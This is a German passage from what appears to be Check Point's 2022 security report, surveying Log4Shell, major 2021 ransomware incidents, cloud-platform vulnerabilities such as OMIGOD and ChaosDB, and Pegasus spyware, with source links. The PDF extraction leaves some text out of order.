Die Schwachstelle könnte es Bedrohungsakteuren ermöglichen, auf jedes System zuzugreifen, das die Bibliothek verwendet, einschließlich Systemen, die zur Verwaltung von Client-Netzwerken und -Ressourcen verwendet werden. Der potenzielle Schaden, der durch diese eine Schwachstelle in einer Open-Source-Bibliothek verursacht werden könnte, zeigt das immense Risiko, das von Software-Lieferketten ausgeht, insbesondere in Fällen, in denen ein unterfinanziertes Projekt, das von einigen Teilzeit-Freiwilligen betrieben wird, eine Schlüsselkomponente ist, auf die sich Tausende von Computersystemen weltweit verlassen.

Gerade als wir dachten, wir hätten die Lieferkettenlandschaft für 2021 abschließend zusammengefasst, wurde die Log4j- Zero-Day-Schwachstelle aufgedeckt. Das Protokollierungspaket Log4j von Apache ist mit über 400.000 Downloads täglich die beliebteste Java-Protokollierungsbibliothek und wird weltweit in Millionen von Java- basierten Anwendungen eingesetzt. Zu den Unternehmen, die Log4j als Logging-Paket verwenden, gehören Cisco, Twitter, Cloudflare, Tesla, Amazon, Apple und weitere. Das Log4j- Paket protokolliert Fehlermeldungen; laut der Meldung der Apache Foundation könnte ein Angreifer, der die Kontrolle über die Protokollmeldungen oder deren Parameter hat, beliebigen Code von einem externen Server über mehrere Protokolle ausführen, wenn die Message-Lookup-Substitution aktiviert ist. Um die Schwachstelle auszunutzen, ist nur eine einzige Zeichenfolge erforderlich.

Seit seiner Entdeckung am 9. Dezember wird die Schwachstelle „Log4Shell“ aktiv ausgenutzt. Die Sicherheitslücke mit der Bezeichnung CVE-2021-44228 könnte es einem nicht authentifizierten Angreifer ermöglichen, bösartigen Code auszuführen oder ein System zu übernehmen, das die verwundbare Version einer Open-Source-Bibliothek verwendet. Es überrascht nicht, dass es im CVSS- Bewertungssystem 10 von 10 Punkten erhielt.

K A P I T E L 3

https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html https://logging.apache.org/log4j/2.x/security.html https://www.bitdefender.com/blog/labs/bitdefender-honeypots-signal-active-log4shell-0-day-attacks-underway-patch-immediately/ https://blog.checkpoint.com/2021/12/13/the-numbers-behind-a-cyber-pandemic-detailed-dive/ https://blog.checkpoint.com/2021/12/11/protecting-against-cve-2021-44228-apache-log4j2-versions-2-14-1/ https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html https://logging.apache.org/log4j/2.x/security.html https://twitter.com/DTCERT/status/1469258597930614787

17CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022 17CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

O M E R D E M B I N S K Y Group Manager,

Data Research

DIE FOLGEN VON CYBERANGRIFFEN Es ist kein Geheimnis, dass ein gezielter oder weit verbreiteter Cyberangriff dramatische Auswirkungen auf die Unternehmensleistung, die Datenintegrität, den Kundenerfolg, den langfristigen Ruf und natürlich auch auf die Finanzen haben kann. Natürlich können Angriffe auf kritische Infrastrukturen sowohl die Routine eines Unternehmens als auch seine gesamte Lieferkette lahmlegen. Im Jahr 2021 wurden wir Zeuge einer ungewöhnlich hohen Zahl von Angriffen, die das tägliche Leben der Menschen störten und in einigen Fällen sogar ihr Gefühl der physischen Sicherheit bedrohten. Unabhängig davon, ob sie finanziell oder ideologisch motiviert sind, suchen Bedrohungsakteure ständig nach zusätzlichen Druckmitteln und neuen Wegen, um den Druck auf ihre Opfer zu erhöhen.

K A P I T E L 3

Wie in unserem Halbjahresbericht dargelegt, nehmen Cyberangriffe auf breiter Front zu, da Bedrohungsakteure die veränderten Umstände und die überstürzten Bemühungen um die digitale Transformation ausnutzen. Laut diesem Bericht ist die Zahl der Cyberangriffe im Vergleich zum Vorjahr um durchschnittlich 50 % gestiegen, wobei der Bildungs- und Forschungssektor mit durchschnittlich 1.605 Angriffen pro Woche am stärksten betroffen zu sein scheint.“

18CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022 18CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

das FBI mit der Untersuchung beauftragte. In Australien wurden einige Schlachthöfe vollständig geschlossen, so dass das Unternehmen gezwungen war, 7.000 Mitarbeiter zu entlassen. Aus Angst vor einem Preisanstieg in Verbindung mit massiver Arbeitslosigkeit gab der CEO von JBS USA, einer Tochtergesellschaft von JBS S.A., schließlich bekannt, dass das Unternehmen den Cyberkriminellen ein Lösegeld in Höhe von 11 Millionen US-Dollar in Bitcoin gezahlt hat.

Auch der Bildungssektor wurde stark in Mitleidenschaft gezogen. Im Jahr 2021 war dies weltweit der am stärksten angegriffene Sektor, mit einem Anstieg von 75 % im Vergleich zu 2020 und durchschnittlich fast 1.605 Angriffsversuchen pro Woche je Unternehmen. Die Störungen in den Bildungseinrichtungen betrafen Studenten, Professoren und andere Mitarbeiter. Die Howard University in Washington D.C. wurde im September Opfer eines Ransomware-Angriffs und war gezwungen, den Unterricht auszusetzen, um eine gründliche Untersuchung ihres Netzwerks sowie eine Überprüfung der Geräte von Studenten und Mitarbeitern durchzuführen. Auch das Lewis and Clark Community College in Illinois war im November Opfer eines Ransomware-Angriffs geworden, der seine Online-Lernplattform und andere wichtige Systeme betraf. Alle Standorte mussten geschlossen und außerschulische Aktivitäten, einschließlich Sportveranstaltungen, die in den Einrichtungen stattfanden, abgesagt werden. Das FBI hat eine Warnung vor der Ransomware PYSA veröffentlicht, die auf Hochschuleinrichtungen in den USA und Großbritannien abzielt.

Einer der bedeutendsten Angriffe in diesem Jahr, der das oben Gesagte hervorragend veranschaulicht, ist ein Ransomware-Vorfall, der im Mai stattfand . Ziel des Angriffs war das Kraftstoffunternehmen Colonial Pipeline, das Treibstoff an die Südostküste der Vereinigten Staaten liefert. Der Vorfall zwang das Unternehmen, seinen Betrieb einzustellen, was die Benzinpreise in die Höhe trieb und an der Ostküste zu einem erheblichen Versorgungsengpass führte. Diese Ereigniskette löste schließlich Panikkäufe aus, da vielen Tankstellen der Treibstoff ausging. Regierungsbeamte appellierten an die Öffentlichkeit, nicht zu den Tankstellen zu eilen, da die Menschen versuchten, Plastiktüten mit Benzin zu füllen, um Vorräte anzulegen. Nur einen Tag nach dem Angriff hatte Colonial Pipeline keine andere Wahl, als das Lösegeld in Höhe von 5 Millionen US-Dollar an die Ransomware-Gruppe DarkSide zu zahlen, um seine Systeme zu entsperren.

Im selben Monat wurde JBS S.A., das weltweit größte fleischverarbeitende Unternehmen, Opfer Opfer eines Angriffs durch die Ransomware-Gruppe REvil. Das brasilianische Unternehmen vertreibt Fleischprodukte, die in 150 Industriebetrieben in 15 Ländern hergestellt werden, und beschäftigt weltweit rund 150.000 Mitarbeiter. Der Angriff auf das Unternehmensnetz betraf Schlachthöfe und Fleischlieferungen in den USA, Kanada und Australien und führte zur Streichung der Schichten von mehr al 3.000 Mitarbeitern. Alle US-amerikanischen Schlachthöfe und Anlagen, die für fast ein Viertel der amerikanischen Fleischlieferungen verantwortlich sind, stellten die Produktion ein, während das Weiße Haus

K A P I T E L 3

https://www.reuters.com/technology/jbs-paid-11-mln-response-ransomware-attack-2021-06-09/ https://blog.checkpoint.com/2021/10/06/as-battle-against-cybercrime-continues-during-cybersecurity-awareness-month-check-point-research-reports-40-increase-in-cyberattacks/ https://www.washingtonpost.com/education/2021/09/08/howard-university-ransomware-cyberattack/ https://www.washingtonpost.com/education/2021/09/08/howard-university-ransomware-cyberattack/ https://www.thetelegraph.com/news/article/Lewis-Clark-remains-offline-after-cyber-attack-16657042.php https://www.thetelegraph.com/news/article/Lewis-Clark-remains-offline-after-cyber-attack-16657042.php https://www.cisa.gov/sites/default/files/publications/PYSA Flash.pdf https://www.zdnet.com/article/colonial-pipeline-ransomware-attack-everything-you-need-to-know/ https://www.nytimes.com/2021/05/08/us/politics/cyberattack-colonial-pipeline.html https://www.usatoday.com/story/news/nation/2021/05/12/colonial-pipeline-cyberattack-anxiety-gasoline-panic-buying/5059184001/ https://gov.georgia.gov/press-releases/2021-05-11/gov-kemp-signs-executive-order-temporarily-suspend-gas-tax-georgia https://www.cnbc.com/2021/06/08/colonial-pipeline-ceo-testifies-on-first-hours-of-ransomware-attack.html https://www.bbc.com/news/world-us-canada-57318965 https://www.newsweek.com/russia-linked-cyber-attack-jbs-meats-hits-7000-jobs-1596713 https://www.bloomberg.com/news/articles/2021-05-31/meat-is-latest-cyber-victim-as-hackers-hit-top-supplier-jbs

19CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022 19CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

Angriff legte die Computer und einen Teil der Krankenhausinfrastruktur lahm, so dass die Entlassung und Behandlung von Patienten nicht mehr möglich war, da die Patientenakten nicht mehr abgerufen und neue Patienten nicht mehr registriert werden konnten. Im Dezember wurde die Behavioral Health Group (BHG), die über 80 Opioid-Behandlungskliniken in den USA unterhält, Opfer eines Cyberangriffs , der ihr Netzwerk eine Woche lang lahmlegte. In einigen Zentren wurden Patienten daran gehindert, die ihnen verordnete Dosis an Medikamenten zur Behandlung von Drogensucht mit nach Hause zu nehmen, da die Computer nicht in der Lage waren, Rezeptetiketten auszudrucken, wodurch die empfindliche Behandlung zur Suchtbekämpfung möglicherweise beeinträchtigt wurde.

Ideologisch motivierte Hacker haben es auch geschafft, Störungen im öffentlichen Leben zu verursachen, insbesondere im Iran. Zunächst sah sich im Juli die iranische Eisenbahninfrastruktur mit einem Cyberangriff konfrontiert, bei dem Hacker Nachrichten über Zugverspätungen oder -ausfälle auf Informationstafeln in Bahnhöfen im ganzen Land anzeigten und die Fahrgäste aufforderten, eine Nummer (die dem Büro des iranischen Obersten Führers Ayatollah Khamenei gehörte) anzurufen, um weitere Informationen zu erhalten. Durch den Angriff wurde der Zugverkehr noch am selben Tag empfindlich gestört, und in der Bevölkerung herrschte Angst und Verwirrung. Check Point Research untersuchte den Angriff und schrieb ihn der Indra-Gruppe zu, die gegen das Regime kämpft und seit mindestens 2019 aktiv ist. Sie ist für die Verwendung von Wiper-Malware bekannt.

Mitte 2021 schließlich griff die Ransomware Grief mehrere Schulbezirke in den USA an, darunter auch einen Schulbezirk in Mississippi. Die Ransomware stahl 10 GB an Daten, einschließlich personenbezogener und beruflicher Informationen, und drohte damit, die Daten zu veröffentlichen, wenn nicht gezahlt wird. Hochschuleinrichtungen wie Universitäten und Fachhochschulen sind lohnende Ziele für Cyberkriminelle, da ihre Systeme, die es Studenten und Lehrkräften ermöglichen, ihre persönlichen Geräte mit dem Netzwerk der Einrichtung zu verbinden, nicht vollständig geschützt sind.

Das Gesundheitswesen ist seit Beginn der Pandemie ebenfalls stark ins Visier von Cyberkriminellen geraten, da Krankenhäuser, Forschungseinrichtungen, die an der Entwicklung von Impfstoffen beteiligt sind, und Pharmaunternehmen aufgrund ihrer zeitkritischen Arbeit verlockende Ziele darstellen. Im Oktober kam es zu einem verheerenden Ransomware-Angriff auf das Gesundheitssystem von Neufundland und Labrador, Kanada. Infolgedessen wurden Mitarbeiter- und Patientendaten gestohlen, und wichtige Systeme waren mehr als eine Woche langaußer Betrieb, was zu einer Verzögerung von Tausenden von Terminen, einschließlich Chemotherapien, führte, da fast alle nicht dringenden Dienstleistungen und Behandlungen in der Provinz abgesagt wurden. Im selben Monat erlebten wir einen der ersten Ransomware-Angriffe auf ein Krankenhaus im Nahen Osten, als die chinesische Gruppe DeepBlueMagic das Hillel Yaffe Medical Center in Hadera, Israel, mit einer speziellen Ransomware angriff. Der

K A P I T E L 3

https://www.ynetnews.com/business/article/bjc1ddesk https://www.bleepingcomputer.com/news/security/cyberattack-on-bhg-opioid-treatment-network-disrupts-patient-care/ https://www.nytimes.com/2021/08/14/world/middleeast/iran-trains-cyberattack.html https://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/ https://mississippitoday.org/2021/06/11/school-district-ransomware-attack-mississippi/ https://mississippitoday.org/2021/06/11/school-district-ransomware-attack-mississippi/ https://blog.checkpoint.com/2021/01/05/attacks-targeting-healthcare-organizations-spike-globally-as-covid-19-cases-rise-again/ https://www.cbc.ca/news/canada/newfoundland-labrador/nl-cyber-attack-worst-canada-1.6236210

20CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022 20CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

Im Oktober wurden 4 300 iranische Tankstellen durch einen massiven Cyberangriff gestört, der auf das elektronische Kartensystem abzielte, das es den Menschen ermöglicht, Benzin mit staatlichen Subventionen zu kaufen. Verbraucher, die ihren Tank füllen wollten, fanden auf dem Bildschirm den Hinweis "Cyberattack 64411", die Telefonnummer des Obersten Führers des Iran (dieselbe, die bei dem Angriff auf den Zugverkehr offengelegt wurde). Der Vorfall sorgte für große Unruhe mit langen Schlangen an den Tankstellen, die Engpässe und plötzliche Preissteigerungen befürchteten.

Alle oben beschriebenen Angriffe hatten erhebliche Auswirkungen auf einen bestimmten Zielsektor und eine bestimmte Region. Sie haben auch viel Aufmerksamkeit in den Medien erregt, was Cyberkriminellen natürlich in die Hände spielt, wenn sie versuchen, Angst zu verbreiten und ihre Opfer zu beeinflussen. Wie das Jahr 2021 gezeigt hat, haben Cyberangriffe leider oft viel größere Auswirkungen auf die allgemeine Bevölkerung, als die Angreifer ursprünglich beabsichtigt haben mögen.

K A P I T E L 3

https://threatpost.com/cyberattack-cripples-iranian-fuel-distribution-network/175794/

21CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022 21CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

I TA I G R E E N B E R G VP, Product Management

CLOUD-DIENSTE UNTER BESCHUSS Im Jahr 2020 brachte die globale Pandemie erhebliche Veränderungen für die Arbeitsumgebung und die Netzwerkarchitektur von Unternehmen mit sich. Im Rahmen dieser Veränderungen haben sich sowohl der Wechsel zu einer cloudbasierten Architektur – die den Bedarf an hybriden, fernverwalteten Netzwerken decken soll – als auch die Bevorzugung von As-a-Service-Anbietern gegenüber traditionellen Anbietern hinsichtlich ihrer Akzeptanz besonders hervorgetan. Im Jahr 2021 wurde dann deutlich, dass Cloud-Umgebungen auch bei den Endnutzern immer beliebter werden. Mitte des Jahres hatte Gartner seine Prognose veröffentlicht, wonach die Ausgaben der Endnutzer für Public-Cloud-Dienste im Jahr 2021 um 23 % auf über 332 Milliarden US-Dollar steigen würden, verglichen mit 270 Milliarden US-Dollar im Jahr 2020 und 242,7 Milliarden US- Dollar im Jahr 2019. Unternehmen investieren inzwischen in großem Umfang in Multi- Cloud-Architekturen, wobei Microsoft Azure und AWS in der Beliebtheit führend sind und Google Cloud Platform, IBM, VMWare und andere ebenfalls einen beachtlichen Anteil des Marktes beherrschen.

K A P I T E L 3

Es ist verständlich, dass Unternehmen in immer stärkerem Ausmaß auf die Cloud angewiesen sind, insbesondere da wir uns auf eine „neue Normalität“ nach der Pandemie zubewegen, in der hybrides Arbeiten in vielen Bereichen eine Schlüsselrolle spielen wird. Die Verlagerung der Produktivität in die Cloud bedeutet aber auch, dass sich die Unternehmen bei der Verwaltung ihrer Datenbanken, ihres firmeneigenen Codes und ihrer organisatorischen Ressourcen immer mehr auf Anbieter verlassen, von denen viele interne Wissenslücken haben, die sie nun mühsam schließen müssen. Diese Lücken zu schließen, sollte 2022 eines der wichtigsten Ziele für Unternehmen sein, damit sie ihre Beziehungen zu Cloud-Anbietern im Hinblick auf Sicherheit, Compliance und Risiken optimal nutzen können.

https://www.gartner.com/en/newsroom/press-releases/2021-04-21-gartner-forecasts-worldwide-public-cloud-end-user-spending-to-grow-23-percent-in-2021 https://www.zdnet.com/article/the-top-cloud-providers-of-2021-aws-microsoft-azure-google-cloud-hybrid-saas/

22CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022 22CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

Es liegt auf der Hand, dass Unternehmen zunehmend von Cloud-Anbietern abhängig sind, wenn es um die sichere Verwaltung ihrer Datenbanken, ihres firmeneigenen Codes und ihrer Unternehmensressourcen geht. Diese Unternehmen schließen nun allmählich die Wissenslücken im Bereich Plattform- und Rollenmanagement, die während der raschen Umstellung auf cloudbasierte Umgebungen im Jahr 2020 entstanden sind, was zu einer besseren Sicherheit und umfassenderen Verwaltung führt. IAM (Identity and Access Management) Role Assumption-Angriffe, die darauf abzielen, erweiterte Rechte zu erlangen, nachdem man sich unbefugt Zugang verschafft hat, stellen jedoch weiterhin ein großes Problem dar.

Wie üblich liefern sich die Bedrohungsakteure auf der Suche nach neuen Schwachstellen und Exploits einen Wettlauf mit den Sicherheitsexperten. Seit Ende 2021 haben wir eine Welle von Angriffen erlebt, bei denen Schwachstellen in den Diensten branchenführender Cloud-Dienstanbieter ausgenutzt wurden, um die Kontrolle über die Cloud-Infrastruktur eines Unternehmens zu erlangen oder möglicherweise die gesamte Datenbank des Unternehmens, in der firmeneigene, Kunden- und Finanzdaten gespeichert sind. Bei den hier diskutierten Schwachstellen handelt es sich nicht um Fehler in der Vertrauenslogik, sondern um rechtebasierte Schwachstellen, die sich aus der Rollenpolitik des Unternehmens ergeben und von Bedrohungsakteuren zur schrittweisen Rechteausweitung innerhalb der Umgebung genutzt werden. Stattdessen haben wir es mit kritischen Schwachstellen in der Cloud- Infrastruktur selbst zu tun, die die vollständige Übernahme von Konten oder die Ausführung von beliebigem Code ermöglichen können.

Angeführt wird dieser Trend von den berüchtigten Angriffen auf die OMIGOD- Schwachstelle. Im September fanden Forscher vier kritische Sicherheitslücken in OMI (Open Management Infrastructure), einem Software- Agenten von Microsoft Azure, mit dem Benutzer Konfigurationen in entfernten und lokalen Umgebungen verwalten können. OMI wird auf Azure-Linux-VMs bereitgestellt, die in mehrere Azure-Dienste eingebettet sind, und wird automatisch bereitgestellt, wenn einige Dienste aktiviert werden – wodurch diese Schwachstellen mit hoher Wahrscheinlichkeit ausgenutzt werden. Schätzungsweise 65 % aller Azure-Kunden sind gefährdet, was Tausenden von Unternehmen und Millionen von Endgeräten entspricht. OMIGOD-Schwachstellen lassen sich leicht ausnutzen, da nur eine einzige Anfrage mit entferntem Authentifizierungs- Header erforderlich ist.Zusammengenommen könnten die Schwachstellen es Akteuren ermöglichen, beliebigen Code in einem verwundbaren Netzwerk aus der Ferne auszuführen und Root-Rechte zu erlangen.

Microsoft hat bereits einen Patch veröffentlicht, um die Schwachstellen in der Version vom September 2021 zu beheben. Einige Forscher warnten jedoch, dass die automatische Korrektur des Unternehmens mehrere Tage lang unwirksam war, bis das Problem behoben wurde. Angriffe, die diese Schwachstellen ausnutzen, insbesondere die mit 9,8 bewertete RCE-Schwachstelle mit der Bezeichnung CVE- 2021-38647, wurden bereits zum Zeitpunkt der Veröffentlichung beobachtet und haben seitdem rapide zugenommen. Die Anzahl der Server, die auf anfällige Geräte gescannt wurden, stieg allein am ersten Wochenende von etwa 10 auf über 100. Das berüchtigte Mirai IoT (Internet-of- Things)-Botnet war eines der ersten, das es auf

K A P I T E L 3

https://blog.checkpoint.com/2021/05/05/check-your-privilege-the-risks-of-privilege-escalation-in-the-cloud/ https://www.praetorian.com/blog/aws-iam-assume-role-vulnerabilities/ https://blog.checkpoint.com/2021/05/05/check-your-privilege-the-risks-of-privilege-escalation-in-the-cloud/ https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure https://www.wiz.io/blog/secret-agent-exposes-azure-customers-to-unauthorized-code-execution https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647 https://www.securityweek.com/attacks-targeting-omigod-vulnerability-ramping https://twitter.com/andrew___morris/status/1438598477718622214

23CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022 23CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

öffentlichen Cloud-Dienstes gehören. Das bedeutet, dass ein böswilliger Benutzer von Azure Container Instances (ACI) möglicherweise beliebigen Code auf Kubernetes-Clustern anderer Clients ausführen könnte. Die Ausnutzung der Schwachstelle erfolgt in drei Stufen, beginnend mit dem Container- Escape, einer Technik zur Rechteausweitung in Container-Umgebungen. Azurescape ermöglicht es einem Angreifer, administrative Rechte über einen ganzen Cluster von Containern zu erlangen. Glücklicherweise wurde nach Bekanntwerden der Schwachstelle schnell ein Patch veröffentlicht, doch Maßnahmen der ACI-Benutzer sind ebenfalls erforderlich. Bis Ende 2021 wurden keine Expoits entdeckt. Die Schwachstelle hat jedoch das Bewusstsein für die Gefahren geschärft, die von mandantenfähigen Cloud-Umgebungen ausgehen, d. h. von groß angelegten Infrastrukturen, die mehrere Unternehmen auf einer einzigen Plattform hosten.

Microsoft Azure ist nicht der einzige Dienst, in dem im vergangenen Jahr Sicherheitslücken entdeckt wurden. Im Juni entdeckten Forscher eine Schwachstelle in Googles Compute Engine (GCE), einer Infrastructure-as-a-Service (IaaS)-Komponente der Google Cloud Platform, die zum Erstellen und Starten virtueller Maschinen auf Abruf verwendet wird. Die Schwachstelle ermöglicht einem Angreifer die Übernahme virtueller Maschinen aufgrund einer Kombination von Faktoren, einschließlich der Verwendung schwacher Zufallszahlen durch die ISC DHCP-Software. Die Ausnutzung der Schwachstelle, die durch das Imitieren des Metadatenservers aus der Sicht der betroffenen VM erreicht wird, könnte es den Akteuren ermöglichen, sich schließlich als Root-User der

anfällige Geräte abgesehen hatte. Die Malware versuchte, Port 5896 (den OMI-SSL-Port) zu schließen, um andere Akteure daran zu hindern, den Angriff zu nutzen. Es wurden auch Angriffe beobachtet, die darauf abzielen, Krypto-Miner auf ungepatchten Linux-Geräten einzusetzen.

Eine weitere alarmierende Schwachstelle in Microsoft Azure wurde einen Monat zuvor, im August, aufgedeckt. Dieses Mal wurde die Schwachstelle mit dem Namen „ChaosDB“ in Azure Cosmos DB gefunden, einer NoSQL- Datenbank mit mehreren Modellen, die von einigen der weltweit führenden Unternehmen wie Coca Cola, Skype und Symantec für die Verwaltung großer Datenbanken einschließlich Finanztransaktionsdaten verwendet wird. Die Schwachstelle ermöglicht es einem Akteur, mehrere interne Schlüssel abzurufen, mit denen er Root-Rechte erlangen kann, die es ihm schließlich ermöglichen, auf die Datenbanken und Konten des Unternehmens zuzugreifen. Einfach ausgedrückt, können Angreifer durch Ausnutzung dieser Schwachstelle die vollständige und uneingeschränkte Kontrolle über die gesamten Cloud-Ressourcen aller Azure Cosmos DB-Clients erlangen.

Eine weitere Sicherheitslücke in Microsoft Azure wurde gegen Ende des Jahres entdeckt. Die Schwachstelle mit der Bezeichnung „Azurescape“ betrifft die Container-as-a- Service (CaaS)-Plattform von Azure und beruht auf einer zwei Jahre alten Sicherheitslücke mit der Bezeichnung CVE-2019-5736 in RunC, einer Container-Laufzeitumgebung. Azurescape ist eine einzigartige kontoübergreifende Sicherheitslücke: Sie ermöglicht es einem Angreifer, aus der angegriffenen Umgebung auszubrechen und Code in Umgebungen auszuführen, die anderen Benutzern desselben

K A P I T E L 3

https://threatpost.com/azurescape-kubernetes-attack-container-cloud-compromise/169319/ https://thehackernews.com/2021/06/unpatched-virtual-machine-takeover-bug.html https://github.com/irsl/gcp-dhcp-takeover-code-exec https://twitter.com/GossiTheDog/status/1438832601221976065 https://therecord.media/ddos-botnets-cryptominers-target-azure-systems-after-omigod-exploit-goes-public/ https://www.wiz.io/blog/chaosdb-how-we-hacked-thousands-of-azure-customers-databases https://gotcosmos.com/about/customers https://www.wiz.io/blog/chaosdb-explained-azures-cosmos-db-vulnerability-walkthrough https://unit42.paloaltonetworks.com/azure-container-instances/ https://msrc-blog.microsoft.com/2021/09/08/coordinated-disclosure-of-vulnerability-in-azure-container-instances-service/ https://unit42.paloaltonetworks.com/breaking-docker-via-runc-explaining-cve-2019-5736/ https://www.paloaltonetworks.com/blog/2021/09/azurescape/

24CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022 24CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

FPO

VM anzumelden. Google hat fast ein Jahr nach Bekanntwerden der Schwachstelle ein Patch für diese veröffentlicht.

Jüngste Forschungen bieten auch einen detaillierten Überblick über eine Technik, die HTTP-Header-Schmuggel genannt wird, und deren potenzielle Verwendung für Angriffe auf das API-Gateway von AWS und AWS Cognito, einen Authentifizierungsanbieter. Die Untersuchung zeigt, wie diese Technik genutzt werden kann, um Beschränkungen zu umgehen und Cache Poisoning zu betreiben.

Ende 2021 bemerkten Forscher eine merkwürdige Änderung in den AWS- Berechtigungen, die es den AWS- Supportdiensten ermöglichen könnte, die Daten des S3-Buckets eines Kunden zu lesen, anstatt nur die Metadaten zu beobachten. Dieses potenzielle Datenschutzproblem wurde durch eine Änderung der Berechtigungen einer obligatorischen Rolle mit der Bezeichnung „AWSServiceRoleForSupport“ ermöglicht,

die geschaffen wurde, um technische und administrative Unterstützung zu ermöglichen. Schließlich wurde die Änderung rückgängig gemacht, und AWS erklärte, dass es zusätzliche Sicherheitsvorkehrungen treffen werde, um solche Fehlkonfigurationen in Zukunft zu verhindern.

Zusammenfassend lässt sich sagen, dass im Jahr 2021 die Schwachstellen bei Cloud- Anbietern viel alarmierender waren als zuvor. Die Schwachstellen, die im Laufe des Jahres aufgedeckt wurden, haben es Angreifern ermöglicht, für unterschiedlich lange Zeiträume beliebigen Code auszuführen, sich Root-Rechte zu verschaffen, auf große Mengen privater Inhalte zuzugreifen und sogar zwischen verschiedenen Umgebungen zu wechseln. Kurzum, es wurden Schwachstellen in der Cloud-Infrastruktur selbst aufgedeckt, die selbst der wachsamste und professionellste Cloud-Nutzer nicht hätte vorhersehen oder verhindern können.

K A P I T E L 3

https://www.securityweek.com/google-working-patching-gcp-vulnerability-allows-vm-takeover https://www.intruder.io/research/practical-http-header-smuggling https://twitter.com/QuinnyPig/status/1473705669517791253 https://aws.amazon.com/security/security-bulletins/AWS-2021-007/

25CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022 25CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

Zunächst müssen wir uns mit den Entwicklungen rund um Pegasus von NSO befassen, eine der berüchtigtsten mobilen Malware-Familien. Pegasus ist eine mobile Spyware, die sowohl iOS- als auch Android-Geräte infizieren kann. Sie wurde von der in Israel ansässigen NSO Group entwickelt und vermarktet. Die Spionagesoftware kann die vollständige Kontrolle über Mobilgeräte erlangen und eine Vielzahl von Datentypen wie Nachrichten, Fotos, Kalender, E-Mails und mehr abfangen. Außerdem kann die Schadsoftware die Kamera aktivieren, Bilder erfassen und Gespräche in der Umgebung aufzeichnen. Die Pegasus-Infektion basiert auf einem ausgeklügelten Zero-Click-Exploit. Obwohl die Malware erstmals 2016 entdeckt wurde, wurde 2019 aufgedeckt, dass die Spyware sich über WhatsApp verbreitete, um mehr als 1.400 Nutzer zu infizieren, die Ziele mehrerer NSO-Kunden.

Im Juli 2021 berichteten zahlreiche Nachrichtenportale, dass das Tool genutzt wurde, um Zugriff auf die Mobilgeräte von Regierungsbeamten, Journalisten, Menschenrechtsaktivisten und Geschäftsleuten weltweit zu erhalten. Eine Liste von rund 50.000 potenziellen Pegasus-Opfern wurde

MOBILE ARENA-ENTWICKLUNGEN Im Laufe des Jahres 2021 konzentrierten sich die Bedrohungsakteure immer stärker auf Mobilgeräte, sowohl bei groß angelegten Kampagnen gegen Endbenutzer als auch bei gezielten Angriffen auf Unternehmen. Eine umfragebasierte Studie hat ergeben, dass die Umsetzung der BYOD-Richtlinie (Bring-Your-Own-Device) am Arbeitsplatz, bei der die Mitarbeiter die ihnen zugewiesenen Firmengeräte durch ihre eigenen persönlichen Geräte ersetzen, die Unternehmen unvorbereitet getroffen hat. Etwa 49 % der befragten Unternehmen gaben an, dass sie nicht in der Lage sind, einen Angriff oder Vorfall auf den Geräten der Mitarbeiter zu erkennen.

veröffentlicht und machte Schlagzeilen, die möglicherweise Aufschluss über die Kunden von NSO geben. Die Aufmerksamkeit der Medien führte zu umfangreichen Untersuchungen, um die Infektionsmethoden von Pegasus aufzudecken und den Benutzern zu helfen, Pegasus auf ihren Geräten zu erkennen. Im September veröffentlichte Apple schließlich Patches für zwei Zero-Day-Schwachstellen in iMessage, die von Pegasus ausgenutzt werden. Diese haben die Bezeichnungen CVE-2021-30860 und CVE-2021-30858. Diese Schwachstellen nutzen iPhones und Macs aus, indem sie bösartigen Dokumenten ermöglichen, Befehle auszuführen. Im November reichte Apple eine Klage gegen NSO ein, weil das Unternehmen seine Hacking- Software auf Apple-Geräten eingesetzt und private Daten gestohlen hatte. Natürlich haben die Bedrohungsakteure infolge des Skandals schnell eine Erpressungsmasche entwickelt. Eine aktuelle Kampagne nutzt die öffentliche Furcht vor der iOS-Spyware Pegasus aus und versucht, potenzielle Opfer einzuschüchtern, indem sie E-Mails mit Lösegeldforderungen verbreitet und vorgibt, private Videos der Opfer zu haben, die angeblich von der Pegasus-Malware aufgenommen wurden.

K A P I T E L 3

https://www.theguardian.com/news/2021/jul/18/what-is-pegasus-spyware-and-how-does-it-hack-phones https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html https://www.theguardian.com/world/2020/apr/29/whatsapp-israeli-firm-deeply-involved-in-hacking-our-users https://techcrunch.com/2021/07/19/toolkit-nso-pegasus-iphone-android/ https://www.bloomberg.com/press-releases/2021-06-15/bitglass-study-finds-security-gaps-continue-to-be-pervasive-across-bring-your-own-device-byod-initiatives https://forbiddenstories.org/case/the-pegasus-project/ https://www.siliconrepublic.com/enterprise/pegasus-spyware-is-my-phone-infected https://www.helpnetsecurity.com/2021/09/14/cve-2021-30860/ https://www.cnet.com/tech/mobile/apple-sues-pegasus-spyware-developer-what-you-need-to-know/ https://www.bleepingcomputer.com/news/security/pegasus-iphone-hacks-used-as-lure-in-extortion-scheme/ https://www.bleepingcomputer.com/news/security/pegasus-iphone-hacks-used-as-lure-in-extortion-scheme/

26CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022 26CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

